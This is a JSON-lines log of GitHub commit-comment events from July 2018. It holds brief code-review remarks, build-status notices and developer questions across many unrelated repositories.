{"id":"7968401455","type":"CommitCommentEvent","actor":{"login":"CDAGaming"},"repo":{"name":"Jonathing/CraftPresence"},"payload":{"comment":{"id":29715200,"position":73,"line":113,"path":"src/main/java/com/github/cdagaming/craftpresence/client/gui/config/ModGuiConfigBiome.java","commit_id":"70d7009a895a426d515a9c1802a162609439d3ed","created_at":"2018-07-16T02:37:56Z","updated_at":"2018-07-16T02:37:56Z","author_association":"NONE","body":"This has already been done in BiomeHandler; It's why the Class Exists. Just use the Biome List available there..."}},"created_at":"2018-07-16T02:37:56Z"}
{"id":"7968403917","type":"CommitCommentEvent","actor":{"login":"Jonathing"},"repo":{"name":"Jonathing/CraftPresence"},"payload":{"comment":{"id":29715202,"position":73,"line":113,"path":"src/main/java/com/github/cdagaming/craftpresence/client/gui/config/ModGuiConfigBiome.java","commit_id":"70d7009a895a426d515a9c1802a162609439d3ed","created_at":"2018-07-16T02:39:18Z","updated_at":"2018-07-16T02:39:18Z","author_association":"OWNER","body":"I wasn’t able to get the list into the class, but then again, I did rush\nthat screen. When I get back on Saturday I’ll finish what I started.\n\nOn Sun, Jul 15, 2018 at 10:37 PM CDAGaming <notifications@github.com> wrote:\n\n> This has already been done in BiomeHandler; It's why the Class Exists.\n> Just use the Biome List available there...\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Jonathing/CraftPresence/commit/70d7009a895a426d515a9c1802a162609439d3ed#commitcomment-29715200>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARUFAGvWZYCSWo5aZja514eWMmgLu1Akks5uG_yEgaJpZM4VQfzj>\n> .\n>\n"}},"created_at":"2018-07-16T02:39:18Z"}
{"id":"7968404428","type":"CommitCommentEvent","actor":{"login":"setcode"},"repo":{"name":"setcode/airstereo.github.io"},"payload":{"comment":{"id":29715203,"position":null,"line":null,"path":null,"commit_id":"ed77e06db47a2ec579ef87fefade21cddd298270","created_at":"2018-07-16T02:39:36Z","updated_at":"2018-07-16T02:39:36Z","author_association":"OWNER","body":"Ok..."}},"created_at":"2018-07-16T02:39:36Z"}
{"id":"7968409420","type":"CommitCommentEvent","actor":{"login":"abitrolly"},"repo":{"name":"genuinetools/reg"},"payload":{"comment":{"id":29715210,"position":null,"line":null,"path":null,"commit_id":"b8168d0c4bb0c47b0e1d46d3aa174b5e37ee9f8e","created_at":"2018-07-16T02:42:24Z","updated_at":"2018-07-16T02:42:24Z","author_association":"NONE","body":"How do you generate `.travis.yml`?"}},"created_at":"2018-07-16T02:42:24Z"}
{"id":"7968410363","type":"CommitCommentEvent","actor":{"login":"senofgithub"},"repo":{"name":"contiv/vpp"},"payload":{"comment":{"id":29715212,"position":null,"line":null,"path":null,"commit_id":"371b93616b6f4e117ca79f3f466059861d814601","created_at":"2018-07-16T02:42:56Z","updated_at":"2018-07-16T02:42:56Z","author_association":"NONE","body":"Hi，\r\nwhen I use \"sudo nc -U /run/vpp/cli-vpp1.sock\", the host shows \"nc: invalid option -- 'U'\r\n\", I guess that '-u' is perfect. So I use \"sudo nc -u /run/vpp/cli-vpp1.sock\", but it is still error, it shows \"/run/vpp/cli-vpp1.sock: forward host lookup failed: Unknown host\". Do you know the reason ?\r\n\r\nThank you!"}},"created_at":"2018-07-16T02:42:56Z"}
{"id":"7968411702","type":"CommitCommentEvent","actor":{"login":"scott88lee"},"repo":{"name":"sadakosa/FoodGecko"},"payload":{"comment":{"id":29715213,"position":null,"line":null,"path":null,"commit_id":"a673c5bb80a4e73bf64d24b5d6a683b737a38439","created_at":"2018-07-16T02:43:43Z","updated_at":"2018-07-16T02:43:43Z","author_association":"COLLABORATOR","body":"Initialised with \r\n\r\nDB file\r\nNPM init & modules\r\nBasic views (home, login & reg)\r\n3 routes and a 404.\r\n"}},"created_at":"2018-07-16T02:43:43Z"}
{"id":"7968412971","type":"CommitCommentEvent","actor":{"login":"gdongy"},"repo":{"name":"AlmirKadric/cordova-plugin-qrscanner"},"payload":{"comment":{"id":29715216,"position":null,"line":null,"path":null,"commit_id":"0f7b574f359c15bc873adb6f204dbb3ffd7cbb36","created_at":"2018-07-16T02:44:26Z","updated_at":"2018-07-16T02:44:26Z","author_association":"NONE","body":"我这样添加之后，重新打包测试，发现相机还是没关，还是会出现相机拍摄的东西的界面"}},"created_at":"2018-07-16T02:44:26Z"}
{"id":"7968413303","type":"CommitCommentEvent","actor":{"login":"Hasil-Sharma"},"repo":{"name":"Hasil-Sharma/leet-code"},"payload":{"comment":{"id":29715217,"position":null,"line":null,"path":null,"commit_id":"82ec10cfb63c358dd0f9479b8d3217c9e8dc12b7","created_at":"2018-07-16T02:44:37Z","updated_at":"2018-07-16T02:44:37Z","author_association":"OWNER","body":"Time Complexity should be `O(nlogn)`"}},"created_at":"2018-07-16T02:44:37Z"}
{"id":"7968419526","type":"CommitCommentEvent","actor":{"login":"huiyuanjuice"},"repo":{"name":"huiyuanjuice/helloword"},"payload":{"comment":{"id":29715231,"position":null,"line":null,"path":null,"commit_id":"10ce68fb9393ddf2aed5980d788ecbd6146e6cc6","created_at":"2018-07-16T02:47:51Z","updated_at":"2018-07-16T02:47:51Z","author_association":"OWNER","body":"#include<stdio.h>\r\n+int main()\r\n+{\r\n+  prinrtf(\"hello,world!\\n\");\r\n   prinrtf(\"I am huiyuanjuice.!\");\r\n+  return 0;\r\n+  }"}},"created_at":"2018-07-16T02:47:51Z"}
{"id":"7968419857","type":"CommitCommentEvent","actor":{"login":"nilperDeveloper"},"repo":{"name":"nilperDeveloper/paginaweb"},"payload":{"comment":{"id":29715232,"position":null,"line":null,"path":null,"commit_id":"28dac19d3d96a807de2885204baace54a5d2e355","created_at":"2018-07-16T02:48:04Z","updated_at":"2018-07-16T02:48:04Z","author_association":"OWNER","body":"menos mal que te diste cuenta que faltaba una linea"}},"created_at":"2018-07-16T02:48:04Z"}
{"id":"7968420851","type":"CommitCommentEvent","actor":{"login":"BangJunga"},"repo":{"name":"pgitbiz/B2CoinBackEnd"},"payload":{"comment":{"id":29715234,"position":null,"line":null,"path":null,"commit_id":"ee9ceaffb1f1aef7bd74ec9c0a6b6b02bb91f02c","created_at":"2018-07-16T02:48:34Z","updated_at":"2018-07-16T02:48:34Z","author_association":"NONE","body":"이빠진파일2"}},"created_at":"2018-07-16T02:48:34Z"}
{"id":"7968422265","type":"CommitCommentEvent","actor":{"login":"uhyun9930"},"repo":{"name":"uhyun9930/ScanUtilityAutomation"},"payload":{"comment":{"id":29715235,"position":null,"line":null,"path":null,"commit_id":"8e5630b5ebf4d6ef2c638c76723ea6295ef7073c","created_at":"2018-07-16T02:49:23Z","updated_at":"2018-07-16T02:49:23Z","author_association":"OWNER","body":"[플밍노트] 윈도우 찾기 http://www.jiniya.net/wp/archives/4363\r\n\r\nhttps://blog.naver.com/tipsware/221003761523"}},"created_at":"2018-07-16T02:49:23Z"}
{"id":"7968422334","type":"CommitCommentEvent","actor":{"login":"nilperDeveloper"},"repo":{"name":"nilperDeveloper/paginaweb"},"payload":{"comment":{"id":29715236,"position":1,"line":1,"path":"index.html","commit_id":"28dac19d3d96a807de2885204baace54a5d2e355","created_at":"2018-07-16T02:49:26Z","updated_at":"2018-07-16T02:49:26Z","author_association":"OWNER","body":"Esta linea siempre se me olvida cuando creo una pagina html"}},"created_at":"2018-07-16T02:49:26Z"}
{"id":"7968423677","type":"CommitCommentEvent","actor":{"login":"BangJunga"},"repo":{"name":"pgitbiz/B2CoinBackEnd"},"payload":{"comment":{"id":29715242,"position":null,"line":null,"path":null,"commit_id":"ee9ceaffb1f1aef7bd74ec9c0a6b6b02bb91f02c","created_at":"2018-07-16T02:50:12Z","updated_at":"2018-07-16T02:50:12Z","author_association":"NONE","body":"이빠진파일2"}},"created_at":"2018-07-16T02:50:12Z"}
{"id":"7968425324","type":"CommitCommentEvent","actor":{"login":"jessfraz"},"repo":{"name":"genuinetools/reg"},"payload":{"comment":{"id":29715243,"position":null,"line":null,"path":null,"commit_id":"b8168d0c4bb0c47b0e1d46d3aa174b5e37ee9f8e","created_at":"2018-07-16T02:51:04Z","updated_at":"2018-07-16T02:51:04Z","author_association":"COLLABORATOR","body":"https://github.com/jessfraz/dotfiles/blob/master/bin/generate-go-project-files"}},"created_at":"2018-07-16T02:51:04Z"}
{"id":"7968427276","type":"CommitCommentEvent","actor":{"login":"odiegosantos"},"repo":{"name":"odiegosantos/odiegosantos.github.io"},"payload":{"comment":{"id":29715246,"position":null,"line":null,"path":null,"commit_id":"f8bdcf3e9bc0e49ffa6403b44cb8e74fb2fe7b33","created_at":"2018-07-16T02:52:14Z","updated_at":"2018-07-16T02:52:14Z","author_association":"OWNER","body":"\r\n@@ -0,0 +1,37 @@\r\n +## Welcome to GitHub Pages\r\n +\r\n +You can use the [editor on GitHub](https://github.com/odiegosantos/odiegosantos.github.io/edit/master/index.md) to maintain and preview the content for your website in Markdown files.\r\n +\r\n +Whenever you commit to this repository, GitHub Pages will run [Jekyll](https://jekyllrb.com/) to rebuild the pages in your site, from the content in your Markdown files.\r\n +\r\n +### Markdown\r\n +\r\n +Markdown is a lightweight and easy-to-use syntax for styling your writing. It includes conventions for\r\n +\r\n +```markdown\r\n +Syntax highlighted code block\r\n +\r\n +# Header 1\r\n +## Header 2\r\n +### Header 3\r\n +\r\n +- Bulleted\r\n +- List\r\n +\r\n +1. Numbered\r\n +2. List\r\n +\r\n +**Bold** and _Italic_ and `Code` text\r\n +\r\n +[Link](url) and ![Image](src)\r\n +```\r\n +\r\n +For more details see [GitHub Flavored Markdown](https://guides.github.com/features/mastering-markdown/).\r\n +\r\n +### Jekyll Themes\r\n +\r\n +Your Pages site will use the layout and styles from the Jekyll theme you have selected in your [repository settings](https://github.com/odiegosantos/odiegosantos.github.io/settings). The name of this theme is saved in the Jekyll `_config.yml` configuration file.\r\n +\r\n +### Support or Contact\r\n +\r\n +Having trouble with Pages? Check out our [documentation](https://help.github.com/categories/github-pages-basics/) or [contact support](https://github.com/contact) and we’ll help you sort it out."}},"created_at":"2018-07-16T02:52:14Z"}
{"id":"7968434145","type":"CommitCommentEvent","actor":{"login":"knettwerk69"},"repo":{"name":"KarChing/publicmobileapp"},"payload":{"comment":{"id":29715254,"position":null,"line":null,"path":null,"commit_id":"02566ea40db77895f293a24e8e19be2d35535d33","created_at":"2018-07-16T02:56:03Z","updated_at":"2018-07-16T02:56:03Z","author_association":"NONE","body":"KarChing README:\r\n\r\nThis is where all the code goes and branches of various code will reside. The MASTER branch will be the only branch that will be used to push everything to the live server.  Code must be vetted and debugged before pushing through to the MASTER branch.\r\n\r\n "}},"created_at":"2018-07-16T02:56:03Z"}
{"id":"7968439241","type":"CommitCommentEvent","actor":{"login":"Kumaranush"},"repo":{"name":"Kumaranush/Projectp"},"payload":{"comment":{"id":29715258,"position":4,"line":4,"path":"new file","commit_id":"5474ef3e5a16eae7341ae950de94131a97362c08","created_at":"2018-07-16T02:58:57Z","updated_at":"2018-07-16T02:58:57Z","author_association":"OWNER","body":"git hub 2\r\n"}},"created_at":"2018-07-16T02:58:57Z"}
{"id":"7968439744","type":"CommitCommentEvent","actor":{"login":"127y"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29715259,"position":null,"line":null,"path":null,"commit_id":"6826affcffc8659aeaaa02c840c2ea5a95da505c","created_at":"2018-07-16T02:59:14Z","updated_at":"2018-07-16T02:59:14Z","author_association":"NONE","body":" // save pet\r\n\"VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\");   Lack of characters\r\nmodify\r\n\"VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\");"}},"created_at":"2018-07-16T02:59:14Z"}
{"id":"7972640285","type":"CommitCommentEvent","actor":{"login":"kait-schorr"},"repo":{"name":"omoniyi21/back-end-project-week"},"payload":{"comment":{"id":29725721,"position":null,"line":null,"path":null,"commit_id":"33be4ebdea02f588be2d75cb1afc6b1a29c2bc9a","created_at":"2018-07-16T20:00:01Z","updated_at":"2018-07-16T20:00:01Z","author_association":"NONE","body":"Try node_modules instead of /node_modules maybe?"}},"created_at":"2018-07-16T20:00:01Z"}
{"id":"7972641591","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29725728,"position":null,"line":null,"path":null,"commit_id":"9da042793df800311d31bc1703cbbfe2adad316d","created_at":"2018-07-16T20:00:19Z","updated_at":"2018-07-16T20:00:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make the sidebar](https://trello.com/c/i537eXfM/14-make-the-sidebar)"}},"created_at":"2018-07-16T20:00:19Z"}
{"id":"7972641625","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29725729,"position":null,"line":null,"path":null,"commit_id":"0c892ac1ea70fa1c5208b2d6ddc9ed3bd3476755","created_at":"2018-07-16T20:00:19Z","updated_at":"2018-07-16T20:00:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make the sidebar](https://trello.com/c/i537eXfM/14-make-the-sidebar)"}},"created_at":"2018-07-16T20:00:19Z"}
{"id":"7972641665","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29725730,"position":null,"line":null,"path":null,"commit_id":"d07a563bdae527a2984156f387ab98988e179d02","created_at":"2018-07-16T20:00:20Z","updated_at":"2018-07-16T20:00:20Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make the sidebar](https://trello.com/c/i537eXfM/14-make-the-sidebar)"}},"created_at":"2018-07-16T20:00:20Z"}
{"id":"7972642571","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"alexfelipe/teste-android-mock"},"payload":{"comment":{"id":29725732,"position":51,"line":53,"path":"app/src/main/java/br/com/alura/leilao/model/Leilao.java","commit_id":"00b774b41ec304ba5954ef88719d7dbf0dfb2055","created_at":"2018-07-16T20:00:29Z","updated_at":"2018-07-16T20:00:29Z","author_association":"NONE","body":"Acho que dá pra extrair um método com esta lógica dos 5 lances aqui"}},"created_at":"2018-07-16T20:00:29Z"}
{"id":"7972644631","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"Ad1n/Black_Jack"},"payload":{"comment":{"id":29725734,"position":42,"line":31,"path":"game.rb","commit_id":"343a2f37593fa76d96d6a0b790d492908abb15cb","created_at":"2018-07-16T20:00:53Z","updated_at":"2018-07-16T20:00:53Z","author_association":"NONE","body":"Мне кажется правильней создавать колоду (или несколько колод) в начале игры и оперировать ей, а не каждый ход создавать новую колоду."}},"created_at":"2018-07-16T20:00:53Z"}
{"id":"7972645495","type":"CommitCommentEvent","actor":{"login":"w7788129"},"repo":{"name":"wellbredgrapefruit/asari"},"payload":{"comment":{"id":29725735,"position":null,"line":null,"path":null,"commit_id":"4219d04639fada999e06bed2b71afc298c50fca4","created_at":"2018-07-16T20:01:04Z","updated_at":"2018-07-16T20:01:04Z","author_association":"NONE","body":"Thank"}},"created_at":"2018-07-16T20:01:04Z"}
{"id":"7972646722","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"Ad1n/Black_Jack"},"payload":{"comment":{"id":29725738,"position":73,"line":57,"path":"game.rb","commit_id":"343a2f37593fa76d96d6a0b790d492908abb15cb","created_at":"2018-07-16T20:01:19Z","updated_at":"2018-07-16T20:01:19Z","author_association":"NONE","body":"тоже самое, у тебя создание колод размазано по всему классу игры"}},"created_at":"2018-07-16T20:01:19Z"}
{"id":"7972648129","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"alexfelipe/teste-android-mock"},"payload":{"comment":{"id":29725741,"position":88,"line":77,"path":"app/src/main/java/br/com/alura/leilao/model/Leilao.java","commit_id":"00b774b41ec304ba5954ef88719d7dbf0dfb2055","created_at":"2018-07-16T20:01:35Z","updated_at":"2018-07-16T20:01:35Z","author_association":"NONE","body":"Faz o if com o early return, geralmente evitamos os ternários por questões de legibilidade... Melhor pecar pelo excesso para os alunos não ficarem com dúvidas."}},"created_at":"2018-07-16T20:01:35Z"}
{"id":"7972652097","type":"CommitCommentEvent","actor":{"login":"SallyRagab"},"repo":{"name":"SallyRagab/Survey-form"},"payload":{"comment":{"id":29725749,"position":null,"line":null,"path":null,"commit_id":"0d443aafb19e21bf9de55ece69e3c2c7eff4a3d7","created_at":"2018-07-16T20:02:26Z","updated_at":"2018-07-16T20:02:26Z","author_association":"OWNER","body":"Check responsiveness"}},"created_at":"2018-07-16T20:02:26Z"}
{"id":"7972652494","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"Planeshifter/isle-editor"},"payload":{"comment":{"id":29725750,"position":124,"line":883,"path":"app/components/markdown-editor/index.js","commit_id":"dd8b05e2cd96f003f12bcd2cf50c8d42ad284937","created_at":"2018-07-16T20:02:31Z","updated_at":"2018-07-16T20:02:31Z","author_association":"OWNER","body":"React component state should always be updated with `this.setState` and not directly so that re-renders are triggered correctly and the state is not mutated. In this case, should change L883 to\r\n\r\n```js\r\nthis.setState({ \r\n    fontSize: newSize \r\n});\r\n```"}},"created_at":"2018-07-16T20:02:31Z"}
{"id":"7972655933","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29725755,"position":null,"line":null,"path":null,"commit_id":"24719af6ae034b9b909363f0340a313f74ae23f8","created_at":"2018-07-16T20:03:16Z","updated_at":"2018-07-16T20:03:16Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 537](https://ci.hashicorp.engineering/viewLog.html?buildId=104289&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T20:03:16Z"}
{"id":"7972660736","type":"CommitCommentEvent","actor":{"login":"rahul1980"},"repo":{"name":"google/sling"},"payload":{"comment":{"id":29725758,"position":13,"line":36,"path":"sling/nlp/parser/parser.cc","commit_id":"a2ca0166c0f11c8114455e81d26451e02bb95446","created_at":"2018-07-16T20:04:16Z","updated_at":"2018-07-16T20:04:16Z","author_association":"CONTRIBUTOR","body":"Moved the implementations (which I call delegate runtimes) to cascade.cc. The parser instantiates the required runtime via Delegate::Create(<runtime>)."}},"created_at":"2018-07-16T20:04:16Z"}
{"id":"7972661402","type":"CommitCommentEvent","actor":{"login":"rahul1980"},"repo":{"name":"google/sling"},"payload":{"comment":{"id":29725761,"position":24,"line":47,"path":"sling/nlp/parser/parser.cc","commit_id":"a2ca0166c0f11c8114455e81d26451e02bb95446","created_at":"2018-07-16T20:04:24Z","updated_at":"2018-07-16T20:04:24Z","author_association":"CONTRIBUTOR","body":"Done"}},"created_at":"2018-07-16T20:04:24Z"}
{"id":"7972662480","type":"CommitCommentEvent","actor":{"login":"rahul1980"},"repo":{"name":"google/sling"},"payload":{"comment":{"id":29725763,"position":91,"line":114,"path":"sling/nlp/parser/parser.cc","commit_id":"a2ca0166c0f11c8114455e81d26451e02bb95446","created_at":"2018-07-16T20:04:37Z","updated_at":"2018-07-16T20:04:37Z","author_association":"CONTRIBUTOR","body":"Good idea. The spec now has the cell name."}},"created_at":"2018-07-16T20:04:37Z"}
{"id":"7972663336","type":"CommitCommentEvent","actor":{"login":"rahul1980"},"repo":{"name":"google/sling"},"payload":{"comment":{"id":29725764,"position":67,"line":94,"path":"sling/nlp/parser/parser.h","commit_id":"a2ca0166c0f11c8114455e81d26451e02bb95446","created_at":"2018-07-16T20:04:48Z","updated_at":"2018-07-16T20:04:48Z","author_association":"CONTRIBUTOR","body":"Removed."}},"created_at":"2018-07-16T20:04:48Z"}
{"id":"7972665897","type":"CommitCommentEvent","actor":{"login":"YaroST12"},"repo":{"name":"celtare21/android_kernel_essential_msm8998"},"payload":{"comment":{"id":29725766,"position":51,"line":2054,"path":"kernel/sched/core.c","commit_id":"af4c36238f96a2feccce1cceb33ff552dc299f7c","created_at":"2018-07-16T20:05:20Z","updated_at":"2018-07-16T20:05:20Z","author_association":"CONTRIBUTOR","body":"Are you fucking kidding me IT DOESN'T EVEN COMPILE"}},"created_at":"2018-07-16T20:05:20Z"}
{"id":"7972666387","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"alexfelipe/teste-android-mock"},"payload":{"comment":{"id":29725770,"position":47,"line":47,"path":"app/src/main/java/br/com/alura/leilao/ui/activity/ListaUsuarioActivity.java","commit_id":"00b774b41ec304ba5954ef88719d7dbf0dfb2055","created_at":"2018-07-16T20:05:27Z","updated_at":"2018-07-16T20:05:27Z","author_association":"NONE","body":"Aqui seria melhor passar no construtor estas informações, vai ficar mais fácil de testar"}},"created_at":"2018-07-16T20:05:27Z"}
{"id":"7972668979","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29725776,"position":16,"line":62,"path":"code/drasil-docLang/Drasil/DocumentLanguage/Definitions.hs","commit_id":"1ac44586e3088e138c4bed83f1f5fa2bf385372b","created_at":"2018-07-16T20:05:59Z","updated_at":"2018-07-16T20:05:59Z","author_association":"COLLABORATOR","body":"Do the changes in this commit look like they're on the right track @szymczdm?\r\nI've been adding `FIXME`s wherever I think a better look is necessary in the current implementation, but I think another opinion would be useful."}},"created_at":"2018-07-16T20:05:59Z"}
{"id":"7972668985","type":"CommitCommentEvent","actor":{"login":"rahul1980"},"repo":{"name":"google/sling"},"payload":{"comment":{"id":29725777,"position":89,"line":116,"path":"sling/nlp/parser/parser.h","commit_id":"a2ca0166c0f11c8114455e81d26451e02bb95446","created_at":"2018-07-16T20:05:59Z","updated_at":"2018-07-16T20:05:59Z","author_association":"CONTRIBUTOR","body":"I am not 100% sure if I got what you intended, but I now have a separate DelegateInstance class that contains the myelin instance and a pointer to the delegate. Any other state can be added later on."}},"created_at":"2018-07-16T20:05:59Z"}
{"id":"7972669688","type":"CommitCommentEvent","actor":{"login":"rahul1980"},"repo":{"name":"google/sling"},"payload":{"comment":{"id":29725780,"position":179,"line":270,"path":"sling/nlp/parser/parser.h","commit_id":"a2ca0166c0f11c8114455e81d26451e02bb95446","created_at":"2018-07-16T20:06:08Z","updated_at":"2018-07-16T20:06:08Z","author_association":"CONTRIBUTOR","body":"Done"}},"created_at":"2018-07-16T20:06:08Z"}
{"id":"7972671609","type":"CommitCommentEvent","actor":{"login":"timurrv"},"repo":{"name":"argustelecom/LearnJavaHomeWorks"},"payload":{"comment":{"id":29725784,"position":null,"line":null,"path":null,"commit_id":"48bcdb6dbd64b264a2ddd9f2a6e20b8458625321","created_at":"2018-07-16T20:06:32Z","updated_at":"2018-07-16T20:06:32Z","author_association":"CONTRIBUTOR","body":"По феншую надо было бы веточку свою от мастер отвести."}},"created_at":"2018-07-16T20:06:32Z"}
{"id":"7972673123","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29725788,"position":null,"line":null,"path":null,"commit_id":"b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a","created_at":"2018-07-16T20:06:52Z","updated_at":"2018-07-16T20:06:52Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1695 of 1695 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.03%25-green.png)</a>\n"}},"created_at":"2018-07-16T20:06:52Z"}
{"id":"7972676395","type":"CommitCommentEvent","actor":{"login":"murrant"},"repo":{"name":"librenms/librenms"},"payload":{"comment":{"id":29725792,"position":null,"line":null,"path":null,"commit_id":"ad6ec7f72a7d7326859985a8981b9106259f2d8d","created_at":"2018-07-16T20:07:32Z","updated_at":"2018-07-16T20:07:32Z","author_association":"MEMBER","body":"People responding here.  Your dependencies are not up-to-date.  Likely you ran something previously as the root user and broke permissions so the updater can no longer update dependencies. `./validate.php` will show you the error and how to fix."}},"created_at":"2018-07-16T20:07:32Z"}
{"id":"7972678544","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"TipsyOs/frameworks_base"},"payload":{"comment":{"id":29725795,"position":null,"line":null,"path":null,"commit_id":"a53420bcd064d8f8b990a3c7587d14878928befd","created_at":"2018-07-16T20:08:00Z","updated_at":"2018-07-16T20:08:00Z","author_association":"MEMBER","body":":beers: "}},"created_at":"2018-07-16T20:08:00Z"}
{"id":"7972682553","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"alexfelipe/teste-android-mock"},"payload":{"comment":{"id":29725818,"position":51,"line":51,"path":"app/src/main/java/br/com/alura/leilao/ui/recyclerview/adapter/ListaUsuarioAdapter.java","commit_id":"00b774b41ec304ba5954ef88719d7dbf0dfb2055","created_at":"2018-07-16T20:08:53Z","updated_at":"2018-07-16T20:08:53Z","author_association":"NONE","body":"Algum motivo específico para usar o add na posição 0?"}},"created_at":"2018-07-16T20:08:53Z"}
{"id":"7972683772","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"Ad1n/Black_Jack"},"payload":{"comment":{"id":29725821,"position":5,"line":11,"path":"dealer.rb","commit_id":"343a2f37593fa76d96d6a0b790d492908abb15cb","created_at":"2018-07-16T20:09:09Z","updated_at":"2018-07-16T20:09:09Z","author_association":"NONE","body":"Так точно нельзя делать:\r\n1. Зачем дилеру знать о классе Deck? Пускай получает 2 карты при создании а потом добавляет их в массив через отдельный метод который принимает еще карту\r\n2. Колоду необходимо создавать в одном месте, при старте игры и оперировать ей"}},"created_at":"2018-07-16T20:09:09Z"}
{"id":"7972684544","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29725827,"position":null,"line":null,"path":null,"commit_id":"1452ffebd3522cc86aaeaeb2f18fe11c77e010eb","created_at":"2018-07-16T20:09:17Z","updated_at":"2018-07-16T20:09:17Z","author_association":"COLLABORATOR","body":"Puzzle `694-cae8cc62` disappeared from [`src/main/java/ru/mystamps/web/service/SeriesInfoExtractorServiceImpl.java`](https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/service/SeriesInfoExtractorServiceImpl.java), that's why I closed #903. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-16T20:09:17Z"}
{"id":"7972685076","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29725828,"position":null,"line":null,"path":null,"commit_id":"27d9c55fec594bc6b8135cc2ed8f0c891878a433","created_at":"2018-07-16T20:09:23Z","updated_at":"2018-07-16T20:09:23Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-79](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-79).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-79-next50.pantheonsite.io/)"}},"created_at":"2018-07-16T20:09:23Z"}
{"id":"7972691637","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"Ad1n/Black_Jack"},"payload":{"comment":{"id":29725840,"position":37,"line":29,"path":"game.rb","commit_id":"343a2f37593fa76d96d6a0b790d492908abb15cb","created_at":"2018-07-16T20:10:45Z","updated_at":"2018-07-16T20:10:45Z","author_association":"NONE","body":"`scores.scores` не очень)\r\nЯ бы назвал класс Hand (рука игрока/дилера), тогда выглядело бы красивей:\r\n`hand.scores`"}},"created_at":"2018-07-16T20:10:45Z"}
{"id":"7972691990","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29725841,"position":15,"line":15,"path":"tests/TicTacToeTest.php","commit_id":"3ffac1b54136046406dd307d484db49ba64d8037","created_at":"2018-07-16T20:10:49Z","updated_at":"2018-07-16T20:10:49Z","author_association":"NONE","body":"You're thinking too much low-level, and not in terms of business. A player cannot play the game alone, and this idea should be reflected by the code."}},"created_at":"2018-07-16T20:10:49Z"}
